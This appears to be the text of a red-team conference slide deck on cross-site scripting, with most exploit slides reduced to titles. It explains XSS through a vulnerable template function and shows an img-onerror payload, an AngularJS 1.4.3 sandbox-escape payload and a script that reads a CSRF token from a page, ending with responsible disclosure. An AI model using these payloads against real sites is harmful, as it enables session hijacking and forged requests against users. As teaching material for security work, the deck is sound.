Oh My XSS!

Francesco Soncina - ABN AMRO Red Team

https://slides.com/phra/oh-my-xss/live

What are XSS?

function renderTitle(userInput: string) {
  return `<h1>Welcome, ${userInput}!</h1>`
}

Think about the following template function

renderTitle('phra')
// => <h1>Welcome phra!</h1>
renderTitle('<img src=x onerror=alert(1)>')
// => <h1>Welcome <img src=x onerror=alert(1)>!</h1>

XSS are real!

First exploit

First Patch

Second exploit

Third exploit

Forth exploit

Template Injection

{{ 7 * 7 }} => 49

https://docs.angularjs.org/guide/expression

Sandbox Escape

AngularJS 1.4.3 Sandbox Escape

https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs

{{
'a'.constructor.prototype.charAt=[].join;
$eval('x=1} } };alert(1)//');
}}

XSS are real! (2)

XSS are real! (2)

Final Exploit

It works!

Stealing CSRF tokens

function transferComplete(evt) {
  const regex = /CSRF\.token = '(.*)';/gm
  console.log("The transfer is complete.")
  const matches = regex.exec(oReq.responseText)
  const token = matches[1]
  console.log(token) // XXX: CSRF TOKEN!
}

const oReq = new XMLHttpRequest()
oReq.addEventListener("load", transferComplete)
oReq.open("GET", '/console/')
oReq.send()

Responsible Disclosure

Question Time

Made with Slides.com